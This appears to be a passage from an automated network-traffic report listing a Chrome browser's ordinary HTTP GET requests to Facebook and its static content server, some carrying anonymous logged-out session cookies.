    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y2/r/0uUeXNz0Xos.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=1&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/?locale=ru_RUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
